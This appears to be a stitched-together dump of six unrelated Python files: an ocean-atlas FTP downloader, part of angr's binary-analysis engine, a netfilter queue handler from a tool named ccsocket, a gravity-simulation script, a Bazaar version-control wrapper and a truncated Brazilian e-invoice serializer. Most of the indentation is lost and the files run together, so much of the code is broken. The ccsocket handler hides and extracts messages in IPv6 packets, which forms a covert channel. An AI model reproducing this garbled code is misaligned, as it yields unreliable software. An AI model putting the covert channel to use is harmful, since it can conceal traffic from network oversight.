from __future__ import absolute_import, division, print_function, unicode_literals
import os
import logging
log = logging.getLogger(__name__)
from ..helper import Helper as BaseHelper
from hydroffice.base.ftpconnector import FtpConnector
class Woa09Checker(object):
def __init__(self, force_download=True):
self.present = False
self.atlases_folder = self.get_atlases_folder()
        self.present = self.is_present()
        if not self.present and force_download:
            self.present = self._download_and_unzip()
@classmethod
def get_atlases_folder(cls):
""" Return the folder used to store atlases. """
ssp_folder = BaseHelper.default_projects_folder()
return os.path.join(ssp_folder, 'Atlases')
@classmethod
def is_present(cls):
""" Check if the WOA09 atlas is present. """
atlases_folder = cls.get_atlases_folder()
if not os.path.exists(atlases_folder):
log.debug('not found atlases folder')
return False
check_woa09_file = os.path.join(atlases_folder, 'woa09', 'landsea.msk')
log.debug("checking WOA09 test file at path %s" % check_woa09_file)
if not os.path.exists(check_woa09_file):
log.debug('not found woa09 atlas')
return False
return True
def _download_and_unzip(self):
""" Attempt to download the WOA09 atlas. """
        log.debug('downloading WOA09 atlas')
try:
if not os.path.exists(self.atlases_folder):
os.makedirs(self.atlases_folder)
ftp = FtpConnector("ftp.ccom.unh.edu", show_progress=True, debug_mode=False)
data_zip_src = "fromccom/hydroffice/woa09.red.zip"
data_zip_dst = os.path.join(self.atlases_folder, "woa09.red.zip")
ftp.get_file(data_zip_src, data_zip_dst, unzip_it=True)
return self.is_present()
except Exception as e:
log.error('during WOA09 download and unzip: %s' % e)
return False
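
# A minimal usage sketch (hypothetical driver code; assumes the hydroffice
# package imported above is installed and the CCOM FTP server is reachable):
#
#   checker = Woa09Checker(force_download=False)
#   if not checker.present:
#       checker = Woa09Checker()          # force_download defaults to True
#   print("atlases folder: %s" % Woa09Checker.get_atlases_folder())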
from typing import TYPE_CHECKING
import claripy
import pyvex
from ...engines.vex.claripy.datalayer import value as claripy_value
from ...engines.light import SimEngineLightVEXMixin
from ..typehoon import typevars, typeconsts
from .engine_base import SimEngineVRBase, RichR
if TYPE_CHECKING:
from .variable_recovery_base import VariableRecoveryStateBase
class SimEngineVRVEX(
SimEngineLightVEXMixin,
SimEngineVRBase,
):
state: 'VariableRecoveryStateBase'
# Statement handlers
def _handle_Put(self, stmt):
offset = stmt.offset
r = self._expr(stmt.data)
size = stmt.data.result_size(self.tyenv) // 8
if offset == self.arch.ip_offset:
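            # writes to the instruction pointer are not tracked as variable
            # assignments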
return
self._assign_to_register(offset, r, size)
def _handle_Store(self, stmt):
addr_r = self._expr(stmt.addr)
size = stmt.data.result_size(self.tyenv) // 8
r = self._expr(stmt.data)
self._store(addr_r, r, size, stmt=stmt)
def _handle_StoreG(self, stmt):
guard = self._expr(stmt.guard)
if guard is True:
addr = self._expr(stmt.addr)
size = stmt.data.result_size(self.tyenv) // 8
data = self._expr(stmt.data)
self._store(addr, data, size, stmt=stmt)
def _handle_LoadG(self, stmt):
guard = self._expr(stmt.guard)
if guard is True:
addr = self._expr(stmt.addr)
if addr is not None:
self.tmps[stmt.dst] = self._load(addr, self.tyenv.sizeof(stmt.dst) // 8)
elif guard is False:
data = self._expr(stmt.alt)
self.tmps[stmt.dst] = data
else:
self.tmps[stmt.dst] = None
def _handle_LLSC(self, stmt: pyvex.IRStmt.LLSC):
if stmt.storedata is None:
# load-link
addr = self._expr(stmt.addr)
size = self.tyenv.sizeof(stmt.result) // self.arch.byte_width
data = self._load(addr, size)
self.tmps[stmt.result] = data
else:
# store-conditional
storedata = self._expr(stmt.storedata)
addr = self._expr(stmt.addr)
size = self.tyenv.sizeof(stmt.storedata.tmp) // self.arch.byte_width
self._store(addr, storedata, size)
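            # model the store-conditional as always succeeding (result 1)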
self.tmps[stmt.result] = RichR(1)
def _handle_NoOp(self, stmt):
pass
# Expression handlers
def _expr(self, expr) -> RichR:
"""
:param expr:
:return:
:rtype: RichR
"""
r = super()._expr(expr)
if r is None:
bits = expr.result_size(self.tyenv)
return RichR(self.state.top(bits))
return r
def _handle_Get(self, expr):
reg_offset = expr.offset
reg_size = expr.result_size(self.tyenv) // 8
return self._read_from_register(reg_offset, reg_size, expr=expr)
def _handle_Load(self, expr: pyvex.IRExpr.Load) -> RichR:
addr = self._expr(expr.addr)
size = expr.result_size(self.tyenv) // 8
return self._load(addr, size)
def _handle_CCall(self, expr): # pylint:disable=useless-return
# ccalls don't matter
return RichR(self.state.top(expr.result_size(self.tyenv)))
def _handle_Conversion(self, expr: pyvex.IRExpr.Unop) -> RichR:
return RichR(self.state.top(expr.result_size(self.tyenv)))
# Function handlers
def _handle_function(self, func_addr): # pylint:disable=unused-argument,no-self-use,useless-return
return None
def _handle_Const(self, expr):
return RichR(claripy_value(expr.con.type, expr.con.value), typevar=typeconsts.int_type(expr.con.size))
def _handle_Add(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(r0.data + r1.data,
typevar=typeconsts.int_type(result_size),
type_constraints=None)
typevar = None
if r0.typevar is not None and r1.data.concrete:
typevar = typevars.DerivedTypeVariable(r0.typevar, typevars.AddN(r1.data._model_concrete.value))
sum_ = r0.data + r1.data
return RichR(sum_,
typevar=typevar,
type_constraints={ typevars.Subtype(r0.typevar, r1.typevar) },
)
def _handle_Sub(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(r0.data - r1.data,
typevar=typeconsts.int_type(result_size),
type_constraints=None)
typevar = None
if r0.typevar is not None and r1.data.concrete:
typevar = typevars.DerivedTypeVariable(r0.typevar, typevars.SubN(r1.data._model_concrete.value))
diff = r0.data - r1.data
return RichR(diff,
typevar=typevar,
)
def _handle_And(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(r0.data & r1.data)
if self.state.is_stack_address(r0.data):
r = r0.data
elif self.state.is_stack_address(r1.data):
r = r1.data
else:
r = self.state.top(result_size)
return RichR(r)
def _handle_Xor(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(r0.data ^ r1.data)
r = self.state.top(result_size)
return RichR(r)
def _handle_Or(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(r0.data | r1.data)
r = self.state.top(result_size)
return RichR(r)
def _handle_Not(self, expr):
arg = expr.args[0]
r0 = self._expr(arg)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete:
# constants
return RichR(~r0.data)
r = self.state.top(result_size)
return RichR(r)
def _handle_Mul(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(r0.data * r1.data)
r = self.state.top(result_size)
return RichR(r)
def _handle_DivMod(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
try:
signed = "U" in expr.op # Iop_DivModU64to32 vs Iop_DivMod
from_size = r0.data.size()
to_size = r1.data.size()
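                # VEX DivMod ops produce remainder:quotient packed into one
                # value, with the remainder in the high half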
if signed:
quotient = (r0.data.SDiv(claripy.SignExt(from_size - to_size, r1.data)))
remainder = (r0.data.SMod(claripy.SignExt(from_size - to_size, r1.data)))
quotient_size = to_size
remainder_size = to_size
result = claripy.Concat(
claripy.Extract(remainder_size - 1, 0, remainder),
claripy.Extract(quotient_size - 1, 0, quotient)
)
else:
quotient = (r0.data // claripy.ZeroExt(from_size - to_size, r1.data))
remainder = (r0.data % claripy.ZeroExt(from_size - to_size, r1.data))
quotient_size = to_size
remainder_size = to_size
result = claripy.Concat(
claripy.Extract(remainder_size - 1, 0, remainder),
claripy.Extract(quotient_size - 1, 0, quotient)
)
return RichR(result)
except ZeroDivisionError:
pass
r = self.state.top(result_size)
return RichR(r)
def _handle_Div(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
try:
return RichR(r0.data / r1.data)
except ZeroDivisionError:
pass
r = self.state.top(result_size)
return RichR(r)
def _handle_Shr(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(claripy.LShR(r0.data, r1.data._model_concrete.value),
typevar=typeconsts.int_type(result_size),
type_constraints=None)
r = self.state.top(result_size)
return RichR(r,
typevar=r0.typevar,
)
def _handle_Sar(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(r0.data >> r1.data._model_concrete.value,
typevar=typeconsts.int_type(result_size),
type_constraints=None)
r = self.state.top(result_size)
return RichR(r,
typevar=r0.typevar,
)
def _handle_Shl(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(r0.data << r1.data._model_concrete.value,
typevar=typeconsts.int_type(result_size),
type_constraints=None)
r = self.state.top(result_size)
return RichR(r,
typevar=r0.typevar,
)
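    # Comparison handlers: evaluate both operands (so that their uses are
    # still recorded) and return a one-bit TOP, since comparison results are
    # not tracked by this engine.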
def _handle_CmpEQ(self, expr):
arg0, arg1 = expr.args
_ = self._expr(arg0)
_ = self._expr(arg1)
return RichR(self.state.top(1))
def _handle_CmpNE(self, expr):
arg0, arg1 = expr.args
_ = self._expr(arg0)
_ = self._expr(arg1)
return RichR(self.state.top(1))
def _handle_CmpLE(self, expr):
arg0, arg1 = expr.args
_ = self._expr(arg0)
_ = self._expr(arg1)
return RichR(self.state.top(1))
def _handle_CmpLT(self, expr):
arg0, arg1 = expr.args
_ = self._expr(arg0)
_ = self._expr(arg1)
return RichR(self.state.top(1))
def _handle_CmpGE(self, expr):
arg0, arg1 = expr.args
_ = self._expr(arg0)
_ = self._expr(arg1)
return RichR(self.state.top(1))
def _handle_CmpGT(self, expr):
arg0, arg1 = expr.args
_ = self._expr(arg0)
_ = self._expr(arg1)
return RichR(self.state.top(1))
#!/usr/bin/python
# -*- coding: UTF-8 -*-
## This file is part of ccsocket
## Copyright (C) Tomas Dragoun <[email protected]>
## This program is published under a GPLv3 license
########################################################
import nfqueue
import sys
import signal
from multiprocessing import Process, Pipe, Lock
from socket import AF_INET6
from scapy.all import *
from scapy.layers.inet6 import ICMPv6Unknown
from headers import IPv6ExtHdrAH
from constants import Constants
############################
## ##
## NFQHandler ##
## ##
############################
class NFQHandler(Process):
#----------------------------------------------------------------------------------
'''
    This class handles a netfilter queue. It is connected to the parent
    process via a pipe. Messages are decoded and removed from incoming
    packets, and the data are sent through the pipe. In passive mode the
    queue intercepts both incoming and outgoing traffic. Inherits from
    multiprocessing.Process.
'''
#----------------------------------------------------------------------------------
def __init__(self, encoder, pipe, sendevt, stopevt, proto, active, address):
        ''' Call the parent constructor first '''
Process.__init__(self) # init parent (multiprocessing.Process)
self.name = 'NFQHandler-port ' + str(address[1])
self.daemon = True # set process daemonic
''' Initialize class attributes '''
self._const = Constants()
self._encoder = encoder # encodes message in packet
self._pipe = pipe # exchange data with parent process via pipe
self._can_send = sendevt # event shared with parent process
self._stop_send = stopevt # event shared with parent process
self._proto = proto # upper-layer protocol
self._active = active # mode
self._host = address[0]
self._port = address[1]
'''
        The following steps prepare a netfilter queue with _port as the queue
        number. There is always at most one active queue associated with a
        given number.
'''
self._queue = nfqueue.queue() # create queue
self._queue.open() # open queue
try:
self._queue.bind(AF_INET6) # set family type AF_INET6
except: # fails when any other queue already runs
pass
self._queue.set_callback(self.handlepacket) # set queue callback
'''
        The final step raises RuntimeError if another queue with the same
        number is active, the queue was not closed properly, or the user's
        privileges are insufficient.
'''
        self._queue.create_queue(self._port)
#----------------------------------------------------------------------------------
def __del__(self):
if self._pipe: # close connection with parent process
self._pipe.close()
#----------------------------------------------------------------------------------
def destroyqueue(self):
''' Attempts to close queue '''
if self._queue:
#print 'stopping queue ' + str(self._port)
self._queue.close() # close queue
self._queue = None
#----------------------------------------------------------------------------------
def _clear(self):
''' Removes all data to send from pipe and sets state to idle '''
while self._pipe.poll(): # clear pipe
self._pipe.recv()
self._can_send.set()
self._stop_send.clear()
#----------------------------------------------------------------------------------
def run(self):
'''
        Runs an endless loop. Every time a packet arrives in the queue,
        the handlepacket callback is invoked.
'''
#print 'starting queue ' + str(self._port)
self._queue.try_run()
#----------------------------------------------------------------------------------
def handlepacket(self, number, payload):
''' Queue callback function '''
packet = IPv6(payload.get_data()) # decode packet from queue as IPv6
'''
Check if packet belongs to this queue - upperlayer ID field must match
in active mode.
'''
modify, reroute = self._checkport(packet)
if not modify:
'''
Reroute packet to correct queue. Verdict NF_QUEUE is 32-bit
number. Lower 16 bits code this verdict and upper 16 bits
are used to identify target queue.
'''
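            # e.g. nfqueue.NF_QUEUE | (5 << 16) requeues the packet to queue 5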
if reroute != -1:
error = payload.set_verdict(nfqueue.NF_QUEUE | (reroute << 16))
if not error:
return
'''
Packet doesn't have icmp echo layer or target port isn't active,
accept packet
'''
payload.set_verdict(nfqueue.NF_ACCEPT)
return
'''
Port is ok, we need to check if address matches. Ip6tables rules filter
addresses, but packet might have been rerouted from other queue.
'''
if len(self._host): # check source/destination address
if packet.src != self._host and packet.dst != self._host:
payload.set_verdict(nfqueue.NF_ACCEPT)
return
'''
Nfqueue mark is used to distinguish between incoming and outgoing
packets. Each packet is marked.
'''
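        # the marks are assumed to be set by external ip6tables rules,
        # e.g. "... -j MARK --set-mark 1" for incoming traffic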
mark = payload.get_nfmark() # get mark of this packet
if mark == 1: # incoming packet
self._incoming(packet, payload)
elif mark == 2: # outgoing packet
self._outgoing(packet, payload)
#----------------------------------------------------------------------------------
def _incoming(self, packet, payload):
message = self._encoder.getmessage(packet) # decode message
if message is None: # no message
''' Accept packet '''
payload.set_verdict(nfqueue.NF_ACCEPT)
else:
''' Remove message and pass modified packet to queue '''
modified_packet = self._encoder.removemessage(packet)
payload.set_verdict_modified(nfqueue.NF_ACCEPT,
str(modified_packet),
len(modified_packet))
try:
if not len(message):
return
except:
pass
self._pipe.send((message, (packet.src, self._port, 0, 0)))
#----------------------------------------------------------------------------------
def _outgoing(self, packet, payload):
if self._stop_send.is_set():
self._clear()
if self._pipe.poll(): # any data to send?
message = self._pipe.recv() # get message
''' Encode message and return modified packet to queue '''
modified_packet = self._encoder.addmessage(message, (packet, None))
payload.set_verdict_modified(nfqueue.NF_ACCEPT,
str(modified_packet),
len(modified_packet))
if not self._pipe.poll(): # sending finished
self._can_send.set()
else: # nothing to send, return packet to queue
payload.set_verdict(nfqueue.NF_ACCEPT)
#----------------------------------------------------------------------------------
def _checkport(self, packet):
'''
        Returns a tuple (bool, value). The bool is True if the packet belongs
        to this queue; in passive mode it is always True. In active mode the
        upper-layer id field must match the current _port number. The value
        is the number of the queue the packet should be rerouted to.
'''
''' Passive mode - override icmp id check '''
if not self._active:
return (True, 0)
''' Active mode - check icmp (or fragment) id field (~ represents port) '''
if packet.haslayer(ICMPv6EchoRequest): # upperlayer ICMPv6EchoRequest
id = packet[ICMPv6EchoRequest].id
elif packet.haslayer(ICMPv6EchoReply): # upperlayer ICMPv6EchoReply
id = packet[ICMPv6EchoReply].id
elif packet.haslayer(IPv6ExtHdrFragment): # fragmented packet
id = packet[IPv6ExtHdrFragment].id
elif packet.haslayer(ICMPv6Unknown) and packet.haslayer(IPv6ExtHdrAH):
type = packet[ICMPv6Unknown].type # ICMPv6 packet with AH
if type != 128 and type != 129:
return (False, -1) # accept packet
packet[IPv6ExtHdrAH].decode_payload_as(ICMPv6EchoRequest)
id = packet[ICMPv6EchoRequest].id
elif self._proto == self._const.PROTO_ALL: # any protocol
return (True, 0) # id matches port number
else:
return (False, -1) # accept packet
if id == self._port:
return (True, 0) # id matches port number
else:
return (False, id) # reroute to correct queue
#----------------------------------------------------------------------------------
"""
Scenario 1: Game 2
Two bodies (reduced game)
-------------------------
Hypothesize combination of bodies 1 & 4 and 2 & 3
provided the trajectory stays sufficiently far from them
"""
from __future__ import division
from PyDSTool import *
import PyDSTool.Toolbox.phaseplane as pp
from bombardier import *
import bombardier
import fovea
import fovea.graphics as gx
from fovea.graphics import tracker
import yaml
with open('bodies_setup.yaml') as f:
setup = yaml.load(f)
body_setup1 = setup['Full_model']
# hypothesize combination of bodies 1 & 4 and 2 & 3
# then the combo of those
# provided the trajectory stays sufficiently far from them
reduced_data_14 = {1: combine_planets(body_setup1, 1, 4)}
reduced_data_23 = {2: combine_planets(body_setup1, 2, 3)}
body_setup2 = {}
body_setup2.update({0: body_setup1[0]})
body_setup2.update(reduced_data_14)
body_setup2.update(reduced_data_23)
with open('bodies_setup.yaml', 'a') as f:
yaml.dump({'Reduced_model2': body_setup2}, f)
game2 = GUIrocket(body_setup2, "Scenario 1: Game 2", axisbgcol='black')
game2.set( (-70, 0.7) )
game2.go()
dom_thresh = 0.6
def body1_dominant_at_point(pt_array, fsign=None):
"""
    Returns the fraction of the net force at the point contributed by body 1,
    minus the user-set dominance threshold (positive means body 1 dominates)
"""
global dom_thresh
net_Fs = game2.get_forces(pt_array[0],pt_array[1])[0]
return net_Fs[1]/sum(list(net_Fs.values())) - dom_thresh
# Domain growth testing
game2.current_domain_handler.assign_criterion_func(body1_dominant_at_point)
##
##pd = game2.current_domain_handler.polygon_domain_obj
##n=0
##import sys
##def grow_step():
## global n
## n+=1
## print(n)
## sys.stdout.flush()
## pd.grow_step(verbose=True)
## game2.current_domain_handler.show_domain()
## if any(pd.stop_growing):
## print(pd.stop_growing)
## sys.stdout.flush()
# -------------------------------------------------
# Deprecated ways of obtaining measures of interest
#@prep('arclength')
#def arc(con):
# # vector of arclength along pts
# return arclength(con.sim.pts)
#@prep('contrib_1to2')
#def contrib_1to2(con):
# # vector measure of relative contribution by body 1 along orbit
# return con.workspace.Fs_by_body[1]/con.workspace.Fs_by_body[2]
#@prep('contrib_1toall')
#def contrib_1toall(con):
# return con.workspace.Fs_by_body[1]/con.workspace.net_Fs
# scalar measure of relative variability of net force over entire orbit
# (surrogate for eccentricity in multi-body system)
#@prep('variability_force')
#def variability_force(con):
# return np.std(con.workspace.net_Fs)
# -------------------------------------------------
# Attach measures to a context and select which to be hooked up
# to auto-updated plots as game2 is refreshed
game2.calc_context = calc_context_forces(game2, 'con2')
con2 = game2.calc_context
variability_force = fovea.make_measure('variability_force',
'math.sqrt(np.std(net_Fs))')
con2.declare('PyDSTool.Toolbox.phaseplane', 'pp')
arc = fovea.make_measure('arclength', 'pp.arclength(sim.pts)')
contrib_1to2 = fovea.make_measure('contrib_1to2',
'Fs_by_body[1]/Fs_by_body[2]')
contrib_1toall = fovea.make_measure('contrib_1toall',
'Fs_by_body[1]/net_Fs')
w2 = con2.workspace
con2.attach((arc, contrib_1to2, contrib_1toall,
variability_force))
# Don't need to update order
#con2._update_order = ['', '']
#print(con2.arclength())
#print(con2.contrib_1to2())
tracker(con2, 10, 'arclength', 'contrib_1to2', 'k--')
tracker(con2, 10, 'arclength', 'contrib_1toall', 'k:')
tracker.show()
"""
Task: Find zone in which Body 1 dominates
Define by contrib_1toall > 0.75
1. Select good initial position in zone
2. Grow zone as a circle until fails
(3.) Grow similar circular zones and merge them -> tubes, etc.
4. Create bounding events
    ... Why? It establishes the zone in which analytical estimates
    are most valid. So, if we start ICs in that zone, then we don't
    need simulations to estimate outcomes at the exit point
How might it help generate or use further reduced models?
Generate: analytical estimates or a single-body model apply within domain
Error bounds / estimates / correction due to single-body approximation?
How might it help gain insight into the original, full model?
Enables intuitive partial trajectory plan through this zone,
and how it depends on the control parameters a priori
Task: Find sensitivity of zone boundaries to system uncertainty
Q. How does the zone change as system params (masses, positions, etc.) vary?
E.g. to explore their uncertainty to find safest trajectory area to use
"""
eccentricity = fovea.make_measure('ecc', 'sqrt(1+(v*v/(mu*mu) - 2/(r*mu))*(r_cross_v0)**2)')
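# Reading of the expression above (assuming bombardier's usual notation):
# e = sqrt(1 + (v^2/mu^2 - 2/(r*mu)) * h^2) with h = |r x v0|, the standard
# two-body eccentricity obtained from the vis-viva energy relation.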
# This calc_context only applies when body 1 gravity is sufficiently strong
con2_vs1 = bombardier.body_context(game2, 'con2_vs1', 1)
con2_vs1.declare('PyDSTool.Toolbox.phaseplane', 'pp')
# Reuse existing arc measure object
# arc = fovea.make_measure('arclength', 'pp.arclength(sim.pts)')
con2_vs1.attach((arc, eccentricity, total_energy, semimajor, apicenter,
pericenter))
w = con2_vs1.workspace
# decide to monitor actual distance from body 1 along orbit
# to compare with analytical estimate
dist_to_1_vs_peri = fovea.make_measure('dist_to_1_vs_peri', 'pp.dist_vectorized(sim.pos[0], sim.pts[["x","y"]]) - workspace1.peri', workspace1=w)
con2_vs1.attach(dist_to_1_vs_peri)
tracker(con2_vs1, 11, 'arclength', 'dist_to_1_vs_peri', 'k-')
tracker.show()
print("Mismatch of pericenter prediction without reduction: %.5f" % abs(min(w.dist_to_1_vs_peri)))
game2.current_domain_handler.assign_criterion_func(body1_dominant_at_point)
# === FAILS!
#saveObjects(game2, 'game2.sav', force=True)
"""
We find that the analytic pericenter predicted from the IC compares poorly
with the actual pericenter, presumably because the initial condition is not
strongly inside the confidence zone for body 1's dominance. We need error
estimates and a correction using Game 4 (single combined body).
"""
###############################################################################
# Name: Cody Precord #
# Purpose: SourceControl implementation for Bazaar #
# Author: Cody Precord <[email protected]> #
# Copyright: (c) 2008 Cody Precord <[email protected]> #
# License: wxWindows License #
###############################################################################
"""Bazaar implementation of the SourceControl object """
__author__ = "Cody Precord <[email protected]>"
__revision__ = "$Revision: 867 $"
__scid__ = "$Id: BZR.py 867 2009-05-06 12:10:55Z CodyPrecord $"
#------------------------------------------------------------------------------#
# Imports
import os
import datetime
import re
import time
# Local imports
from SourceControl import SourceControl, DecodeString
#------------------------------------------------------------------------------#
class BZR(SourceControl):
""" Bazaar source control class """
name = 'Bazaar'
command = 'bzr'
ccache = list() # Cache of paths that are under bazaar control
repocache = dict()
def __repr__(self):
return 'BZR.BZR()'
def getAuthOptions(self, path):
""" Get the repository authentication info """
output = []
return output
def getRepository(self, path):
""" Get the repository of a given path """
if path in self.repocache:
return self.repocache[path]
if not os.path.isdir(path):
root = os.path.split(path)[0]
else:
root = path
        while True:
            if not root:
                break
            if os.path.exists(os.path.join(root, '.bzr')):
                break
            head = os.path.split(root)[0]
            if head == root:
                # Reached the filesystem root without finding a .bzr directory
                root = ''
                break
            root = head
# Cache the repo of this path for faster lookups next time
self.repocache[path] = root
return root
def isControlled(self, path):
""" Is the path controlled by BZR? """
# Check for cached paths to speed up lookup
if path in self.ccache:
return True
if not os.path.isdir(path):
root = os.path.split(path)[0]
else:
root = path
last = False
while True:
if os.path.exists(os.path.join(root, '.bzr')):
# If a containing directory of the given path has a .bzr
# directory in it run status to find out if the file is being
# tracked or not.
retval = False
out = self.run(root + os.sep, ['status', '-S', path])
if out:
lines = out.stdout.readline()
if lines.startswith('?'):
fname = lines.split(None, 1)[1].strip()
fname = fname.rstrip(os.sep)
retval = not path.endswith(fname)
else:
retval = True
self.closeProcess(out)
if retval:
self.ccache.append(path)
return retval
elif last:
break
else:
root, tail = os.path.split(root)
# If tail is None or '' then this has gotten to the root
# so mark it as the last run
if not tail:
last = True
return False
def add(self, paths):
""" Add paths to the repository """
root, files = self.splitFiles(paths)
out = self.run(root, ['add'] + files)
self.logOutput(out)
self.closeProcess(out)
def checkout(self, paths):
""" Checkout files at the given path """
root, files = self.splitFiles(paths)
        out = self.run(root, ['checkout'] + files)
self.logOutput(out)
self.closeProcess(out)
def commit(self, paths, message=''):
""" Commit paths to the repository """
root, files = self.splitFiles(paths)
out = self.run(root, ['commit', '-m', message] + files)
self.logOutput(out)
self.closeProcess(out)
def diff(self, paths):
""" Run the diff program on the given files """
root, files = self.splitFiles(paths)
out = self.run(root, ['diff'] + files)
self.closeProcess(out)
def makePatch(self, paths):
""" Make a patch of the given paths """
root, files = self.splitFiles(paths)
patches = list()
for fname in files:
out = self.run(root, ['diff', fname])
lines = [ line for line in out.stdout ]
self.closeProcess(out)
patches.append((fname, ''.join(lines)))
return patches
def history(self, paths, history=None):
""" Get the revision history of the given paths """
if history is None:
history = []
root, files = self.splitFiles(paths)
for fname in files:
out = self.run(root, ['log', fname])
logstart = False
if out:
for line in out.stdout:
self.log(line)
if line.strip().startswith('-----------'):
logstart = False
current = dict(path=fname, revision=None,
author=None, date=None, log=u'')
history.append(current)
elif line.startswith('message:'):
logstart = True
elif logstart:
current['log'] += DecodeString(line)
elif line.startswith('revno:'):
current['revision'] = DecodeString(line.split(None, 1)[-1].strip())
elif line.startswith('committer:'):
author = line.split(None, 1)[-1]
current['author'] = DecodeString(author.strip())
elif line.startswith('timestamp:'):
date = line.split(None, 1)[-1]
current['date'] = self.str2datetime(date.strip())
else:
pass
self.logOutput(out)
self.closeProcess(out)
return history
def str2datetime(self, tstamp):
""" Convert a timestamp string to a datetime object """
parts = tstamp.split()
ymd = [int(x.strip()) for x in parts[1].split('-')]
hms = [int(x.strip()) for x in parts[2].split(':')]
date = ymd + hms
return datetime.datetime(*date)
def remove(self, paths):
""" Recursively remove paths from repository """
root, files = self.splitFiles(paths)
out = self.run(root, ['remove', '--force'] + files)
self.logOutput(out)
    def status(self, paths, recursive=False, status=None):
        """ Get BZR status information from given file/directory """
        if status is None:
            status = dict()
codes = {' ':'uptodate', 'N':'added', 'C':'conflict', 'D':'deleted',
'M':'modified'}
root, files = self.splitFiles(paths)
# -S gives output similar to svn which is a little easier to work with
out = self.run(root, ['status', '-S'] + files)
repo = self.getRepository(paths[0])
relpath = root.replace(repo, '', 1).lstrip(os.sep)
unknown = list()
if out:
for line in out.stdout:
self.log(line)
txt = line.lstrip(' +-')
# Split the status code and relative file path
code, fname = txt.split(None, 1)
fname = fname.replace(u'/', os.sep).strip().rstrip(os.sep)
fname = fname.replace(relpath, '', 1).lstrip(os.sep)
code = code.rstrip('*')
# Skip unknown files
if code == '?':
unknown.append(fname)
continue
# Get the absolute file path
current = dict()
try:
current['status'] = codes[code]
status[fname] = current
except KeyError:
pass
# Find up to date files
unknown += status.keys()
for path in os.listdir(root):
if path not in unknown:
status[path] = dict(status='uptodate')
self.logOutput(out)
return status
def update(self, paths):
""" Recursively update paths """
root, files = self.splitFiles(paths)
out = self.run(root, ['update'] + files)
self.logOutput(out)
def revert(self, paths):
""" Recursively revert paths to repository version """
root, files = self.splitFiles(paths)
if not files:
files = ['.']
out = self.run(root, ['revert'] + files)
self.logOutput(out)
def fetch(self, paths, rev=None, date=None):
""" Fetch a copy of the paths' contents """
output = []
for path in paths:
if os.path.isdir(path):
continue
root, files = self.splitFiles(path)
options = []
if rev:
options.append('-r')
options.append(str(rev))
if date:
# Date format YYYY-MM-DD,HH:MM:SS
options.append('-r')
options.append('date:%s' % date)
out = self.run(root, ['cat'] + options + files)
if out:
output.append(out.stdout.read())
self.logOutput(out)
else:
output.append(None)
return output
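
# A minimal usage sketch (hypothetical paths; assumes Editra's SourceControl
# plumbing is available and the `bzr` executable is on the PATH):
#
#   bzr = BZR()
#   if bzr.isControlled('/path/to/project'):
#       print(bzr.status(['/path/to/project']))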
# -*- coding: utf-8 -*-
try:
    set
except NameError:
    from sets import Set as set
from pynfe.entidades import Emitente, Cliente, Produto, Transportadora, NotaFiscal
from pynfe.excecoes import NenhumObjetoEncontrado, MuitosObjetosEncontrados
from pynfe.utils import etree, so_numeros, obter_municipio_por_codigo, obter_pais_por_codigo
from pynfe.utils.flags import CODIGOS_ESTADOS, VERSAO_PADRAO
class Serializacao(object):
"""Classe abstrata responsavel por fornecer as funcionalidades basicas para
exportacao e importacao de Notas Fiscais eletronicas para formatos serializados
de arquivos. Como XML, JSON, binario, etc.
Nao deve ser instanciada diretamente!"""
_fonte_dados = None
    _ambiente = 1  # 1 = production, 2 = homologation (testing)
_nome_aplicacao = 'PyNFe'
def __new__(cls, *args, **kwargs):
if cls == Serializacao:
raise Exception('Esta classe nao pode ser instanciada diretamente!')
else:
return super(Serializacao, cls).__new__(cls, *args, **kwargs)
def __init__(self, fonte_dados, homologacao=False):
self._fonte_dados = fonte_dados
self._ambiente = homologacao and 2 or 1
def exportar(self, destino, **kwargs):
"""Gera o(s) arquivo(s) de exportacao a partir da Nofa Fiscal eletronica
ou lista delas."""
raise Exception('Metodo nao implementado')
def importar(self, origem):
"""Fabrica que recebe o caminho ou objeto de origem e instancia os objetos
da PyNFe"""
raise Exception('Metodo nao implementado')
class SerializacaoXML(Serializacao):
_versao = VERSAO_PADRAO
def exportar(self, destino=None, retorna_string=False, **kwargs):
"""Gera o(s) arquivo(s) de Nofa Fiscal eletronica no padrao oficial da SEFAZ
e Receita Federal, para ser(em) enviado(s) para o webservice ou para ser(em)
armazenado(s) em cache local."""
        # Root node of the output XML
raiz = etree.Element('NFe', xmlns="http://www.portalfiscal.inf.br/nfe")
        # Load the list of Notas Fiscais
notas_fiscais = self._fonte_dados.obter_lista(_classe=NotaFiscal, **kwargs)
for nf in notas_fiscais:
            raiz.append(self._serializar_nota_fiscal(nf, retorna_string=False))
if retorna_string:
